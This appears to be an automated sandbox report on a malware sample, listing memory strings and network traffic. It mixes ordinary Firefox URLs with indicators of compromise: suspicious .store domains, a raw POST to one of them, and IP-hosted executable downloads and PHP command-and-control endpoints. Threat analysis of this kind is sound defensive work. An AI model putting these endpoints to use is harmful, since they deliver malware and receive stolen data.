Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2757990027.000001C1726C0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2722359273.000002B79700A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2757990027.000001C1726C0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2722359273.000002B79700A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2757990027.000001C1726C0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2722359273.000002B79700A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: media.gmp-manager.cert.checkAttributesstartup - adding clearkey CDM failedspeculativeConnectWithOriginAttributessitepermsaddon-provider-registeredfindUpdates() - updateTask succeeded for media.gmp-manager.cert.requireBuiltInonPrefEnabledChanged() - adding gmp directory onPrefEnabledChanged() - removing gmp directory KEY_PLUGIN_LAST_INSTALL_FAIL_REASONuninstallPlugin() - unregistering gmp directory KEY_PLUGIN_LAST_DOWNLOAD_FAIL_REASONstartup - adding clearkey CDM directory media.gmp-manager.checkContentSignaturemedia.gmp-manager.secondsBetweenChecksipc:first-content-process-createdThis should only be called from XPCShell testsonPrefEMEGlobalEnabledChanged() id=SitePermsAddonInstall#cancel called twice on dom.sitepermsaddon-provider.enabledresource://gre/modules/UpdateUtils.sys.mjsaddGatedPermissionTypesForXpcShellTests*://static.criteo.net/js/ld/publishertag.jswebcompat-reporter%40mozilla.org:1.5.1*://*.imgur.com/js/vendor.*.bundle.js@mozilla.org/network/atomic-file-output-stream;1@mozilla.org/network/safe-file-output-stream;1*://www.everestjs.net/static/st.v3.js**://static.chartbeat.com/js/chartbeat_video.js*://cdn.branch.io/branch-latest.min.js*@mozilla.org/addons/addon-manager-startup;1FileUtils_closeAtomicFileOutputStream*://*.imgur.io/js/vendor.*.bundle.js*://web-assets.toggl.com/app/assets/scripts/*.jshttps://smartblock.firefox.etp/play.svg@mozilla.org/network/file-output-stream;1*://libs.coremetrics.com/eluminate.jsFileUtils_closeSafeFileOutputStream*://connect.facebook.net/*/sdk.js**://connect.facebook.net/*/all.js*resource://gre/modules/AddonManager.sys.mjs equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: resource://devtools/server/devtools-server.jsget FIXUP_FLAG_FORCE_ALTERNATE_URIreleaseDistinctSystemPrincipalLoaderdevtools.performance.popup.feature-flagUnable to start devtools server on Failed to listen. Listener already attached.Got invalid request to save JSON dataFailed to execute WebChannel callback:WebChannel/this._originCheckCallbackJSON Viewer's onSave failed in startPersistenceFailed to listen. Callback argument missing.devtools/client/framework/devtools-browserresource://devtools/shared/security/socket.jsbrowser.urlbar.dnsResolveFullyQualifiedNames@mozilla.org/uriloader/handler-service;1devtools/client/framework/devtools^([a-z+.-]+:\/{0,3})*([^\/@]+@).+^[a-z0-9-]+(\.[a-z0-9-]+)*:[0-9]{1,5}([/?#]|$)browser.fixup.dns_first_for_single_words@mozilla.org/network/protocol;1?name=defaultDevTools telemetry entry point failed: devtools.debugger.remote-websocketDevToolsStartup.jsm:handleDebuggerFlag@mozilla.org/dom/slow-script-debug;1{9e9a9283-0ce9-4e4a-8f1c-ba129a032c32}No callback set for this channel.@mozilla.org/network/protocol;1?name=fileresource://gre/modules/ExtHandlerService.sys.mjshttp://win.mail.ru/cgi-bin/sentmsg?mailto=%sextractScheme/fixupChangedProtocol<http://poczta.interia.pl/mh/?mailto=%shttp://compose.mail.yahoo.co.jp/ym/Compose?To=%s_finalizeInternal/this._finalizePromise<resource://gre/modules/URIFixup.sys.mjs{c6cf88b7-452e-47eb-bdc9-86e3561648ef}@mozilla.org/network/async-stream-copier;1https://poczta.interia.pl/mh/?mailto=%sresource://gre/modules/FileUtils.sys.mjsisDownloadsImprovementsAlreadyMigratedgecko.handlerService.defaultHandlersVersionhttps://mail.yahoo.co.jp/compose/?To=%shttp://www.inbox.lv/rfc2368/?value=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%shandlerSvc fillHandlerInfo: don't know this typehttps://mail.inbox.lv/compose?to=%sScheme should be either http or httpsresource://gre/modules/DeferredTask.sys.mjsresource://gre/modules/FileUtils.sys.mjsresource://gre/modules/NetUtil.sys.mjs_injectDefaultProtocolHandlersIfNeeded@mozilla.org/network/file-input-stream;1extension/default-theme@mozilla.org/extendedData@mozilla.org/uriloader/local-handler-app;1Can't invoke URIFixup in the content processresource://gre/modules/JSONFile.sys.mjs{33d75835-722f-42c0-89cc-44f328e56a86}@mozilla.org/uriloader/web-handler-app;1@mozilla.org/uriloader/dbus-handler-app;1resource://gre/modules/JSONFile.sys.mjs@mozilla.org/network/simple-stream-listener;1@mozilla.org/scriptableinputstream;1https://e.mail.ru/cgi-bin/sentmsg?mailto=%sFirst argument should be an nsIInputStreampdfjs.previousHandler.preferredActionpdfjs.previousHandler.alwaysAskBeforeHandling@mozilla.org/uriloader/handler-service;1VALIDATE_DONT_COLLAPSE_WHITESPACE@mozilla.org/network/input-stream-pump;1https://mail.yandex.ru/compose?mailto=%snewChannel requires a single object argumentNon-zero amount of bytes must be specifiedhttps://mail.inbox.lv/compose?to=%s@mozilla.org/uriloader/handler-service;1resource://gre/modules/Integration.sys.mjsMust have a source and a callback
Source: firefox.exe, 0000001B.00000002.2780914101.000001C174EE3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2757990027.000001C1726C0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2780914101.000001C174E9A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.2757990027.000001C1726C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.2780914101.000001C174EE3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2780914101.000001C174E6C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: x*://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: global traffic DNS traffic detected: DNS query: presticitpo.store
Source: global traffic DNS traffic detected: DNS query: crisiwarny.store
Source: global traffic DNS traffic detected: DNS query: fadehairucw.store
Source: global traffic DNS traffic detected: DNS query: thumbystriw.store
Source: global traffic DNS traffic detected: DNS query: necklacedmny.store
Source: global traffic DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: youtube.com
Source: global traffic DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: example.org
Source: global traffic DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: shavar.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: push.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: firefox.settings.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: telemetry-incoming.r53-2.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: prod.remote-settings.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: support.mozilla.org
Source: global traffic DNS traffic detected: DNS query: us-west1.prod.sumo.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: www.youtube.com
Source: global traffic DNS traffic detected: DNS query: www.facebook.com
Source: global traffic DNS traffic detected: DNS query: www.wikipedia.org
Source: global traffic DNS traffic detected: DNS query: star-mini.c10r.facebook.com
Source: global traffic DNS traffic detected: DNS query: dyna.wikimedia.org
Source: global traffic DNS traffic detected: DNS query: www.reddit.com
Source: global traffic DNS traffic detected: DNS query: dualstack.reddit.map.fastly.net
Source: global traffic DNS traffic detected: DNS query: twitter.com
Source: global traffic DNS traffic detected: DNS query: youtube-ui.l.google.com
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: necklacedmny.store
Source: firefox.exe, 0000001B.00000002.2764741953.000001C17457D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://127.0.0.1:
Source: 6cadd3f0fd.exe, 00000009.00000003.2731093184.0000000000778000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/
Source: 6cadd3f0fd.exe, 00000009.00000003.2731093184.0000000000778000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/:
Source: 6cadd3f0fd.exe, 00000009.00000003.2731093184.0000000000778000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: file.exe, file.exe, 00000000.00000003.1845555563.000000000115F000.00000004.00000020.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2731093184.0000000000778000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe
Source: 6cadd3f0fd.exe, 00000009.00000003.2732085528.0000000000793000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe?
Source: file.exe, 00000000.00000003.1844921816.00000000011C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1845532345.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1845244184.00000000011CB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exeG
Source: 6cadd3f0fd.exe, 00000009.00000003.2732085528.0000000000793000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exec
Source: 6cadd3f0fd.exe, 00000009.00000003.2731093184.0000000000778000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exee
Source: 6cadd3f0fd.exe, 00000009.00000003.2731093184.0000000000778000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exee;
Source: skotes.exe, 00000008.00000003.2586871120.0000000000D14000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/test/num.exe
Source: skotes.exe, 00000008.00000003.2586871120.0000000000D14000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/test/num.exe.phpe
Source: skotes.exe, 00000008.00000003.2586871120.0000000000D14000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/test/num.exeage.dll
Source: skotes.exe, 00000008.00000003.2586871120.0000000000D14000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/test/num.exersion
Source: 6cadd3f0fd.exe, 00000009.00000003.2731093184.0000000000778000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/~
Source: 1171a5b648.exe, 0000001F.00000002.2692045054.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206
Source: 1171a5b648.exe, 0000000A.00000002.2531875867.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, 1171a5b648.exe, 0000000A.00000002.2531875867.0000000000F2E000.00000004.00000020.00020000.00000000.sdmp, num.exe, 0000001C.00000002.2611179744.00000000015FE000.00000004.00000020.00020000.00000000.sdmp, num.exe, 0000001C.00000002.2611179744.0000000001642000.00000004.00000020.00020000.00000000.sdmp, 1171a5b648.exe, 0000001F.00000002.2692045054.000000000117B000.00000004.00000020.00020000.00000000.sdmp, 1171a5b648.exe, 0000001F.00000002.2692045054.00000000011E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/
Source: 1171a5b648.exe, 0000001F.00000002.2692045054.00000000011E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
Source: 1171a5b648.exe, 0000000A.00000002.2531875867.0000000000F91000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/
Source: 1171a5b648.exe, 0000000A.00000002.2531875867.0000000000F91000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/;
Source: num.exe, 0000001C.00000002.2611179744.0000000001642000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/V#
Source: 1171a5b648.exe, 0000000A.00000002.2531875867.0000000000F91000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/u
Source: num.exe, 0000001C.00000002.2611179744.0000000001642000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php3
Source: 1171a5b648.exe, 0000001F.00000002.2692045054.00000000011E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php:
Source: num.exe, 0000001C.00000002.2611179744.0000000001642000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php?
Source: 1171a5b648.exe, 0000000A.00000002.2531875867.0000000000F74000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpGY
Source: num.exe, 0000001C.00000002.2611179744.0000000001642000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php_#
Source: 1171a5b648.exe, 0000000A.00000002.2531875867.0000000000F74000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpcY
Source: 1171a5b648.exe, 0000000A.00000002.2531875867.0000000000F74000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phps
Source: 1171a5b648.exe, 0000001F.00000002.2692045054.00000000011E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/C:
Source: num.exe, 0000001C.00000002.2611179744.0000000001642000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/H#)f
Source: 1171a5b648.exe, 0000001F.00000002.2692045054.00000000011E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/_
Source: num.exe, 0000001C.00000002.2611179744.0000000001642000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/b
Source: 1171a5b648.exe, 0000000A.00000002.2531875867.0000000000F91000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/l
Source: 1171a5b648.exe, 0000000A.00000002.2531875867.0000000000F91000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/ws
Source: file.exe, 00000000.00000003.1710536218.0000000005A41000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2483187164.000000000537D000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2630536673.00000000058A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000000.00000003.1710536218.0000000005A41000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2483187164.000000000537D000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2630536673.00000000058A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: firefox.exe, 0000001B.00000002.2742669039.000001C17097D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%s
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%s_finalizeInternal/this._finalizePromise
Source: firefox.exe, 0000001B.00000002.2757990027.000001C1726EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%ss
Source: file.exe, 00000000.00000003.1784302750.00000000011B2000.00000004.00000020.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2557705533.0000000000732000.00000004.00000020.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2689945232.000000000109D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micro
Source: file.exe, 00000000.00000003.1710536218.0000000005A41000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2483187164.000000000537D000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2630536673.00000000058A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe, 00000000.00000003.1710536218.0000000005A41000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2483187164.000000000537D000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2630536673.00000000058A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000003.1710536218.0000000005A41000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2483187164.000000000537D000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2630536673.00000000058A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000003.1710536218.0000000005A41000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2483187164.000000000537D000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2630536673.00000000058A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file.exe, 00000000.00000003.1710536218.0000000005A41000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2483187164.000000000537D000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2630536673.00000000058A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: firefox.exe, 0000001B.00000002.2749174259.000001C17191A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 0000001B.00000002.2744766730.000001C170CF6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 0000001B.00000002.2744766730.000001C170CF6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: firefox.exe, 0000001B.00000002.2773817495.000001C174760000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListenerFailed
Source: firefox.exe, 0000001B.00000002.2773817495.000001C174760000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListenerThe
Source: firefox.exe, 0000001B.00000002.2736051759.000001C170326000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/common
Source: firefox.exe, 0000001B.00000002.2736051759.000001C170347000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/dates-and-times
Source: firefox.exe, 0000001B.00000002.2736051759.000001C170326000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/math
Source: firefox.exe, 0000001B.00000002.2736051759.000001C170347000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/regular-expressions
Source: firefox.exe, 0000001B.00000002.2736051759.000001C170326000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/sets
Source: firefox.exe, 0000001B.00000002.2733122243.000001C164C03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/stringsd
Source: firefox.exe, 0000001B.00000002.2785119034.000001C1752B5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-04/schema#
Source: firefox.exe, 0000001B.00000002.2785119034.000001C1752B5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-06/schema#
Source: firefox.exe, 0000001B.00000002.2785119034.000001C1752B5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-07/schema#-
Source: firefox.exe, 0000001B.00000002.2785119034.000001C1752B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2706509411.000001C17EDBC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org
Source: firefox.exe, 0000001B.00000002.2757990027.000001C1726C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DEF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/additionalProperties
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsFeatureGate
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsShowLessFrequentlyCap
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsUITreatment
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryEnabled
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DEF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryMinCharsThreshold
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DEF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryUseCountThreshold
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bestMatchBlockingEnabled
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bestMatchEnabledtoolkit.scrollbox.scrollIncrement
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bestMatchEnabledtoolkit.scrollbox.scrollIncrementtoolkit.scrollbox.c
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DEF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/experimentType
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DEF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/exposureResults
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DEF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/mdnFeatureGate
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DEF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoEnabled
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DEF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoProviders
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DEF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoTimeoutMs
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DEF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestAllowPositionInSuggestions
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DEF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestDataCollectionEnabled
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DEF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestImpressionCapsNonSponsoredEnabled
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DEF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestImpressionCapsSponsoredEnabled
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DEF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestOnboardingDialogVariation
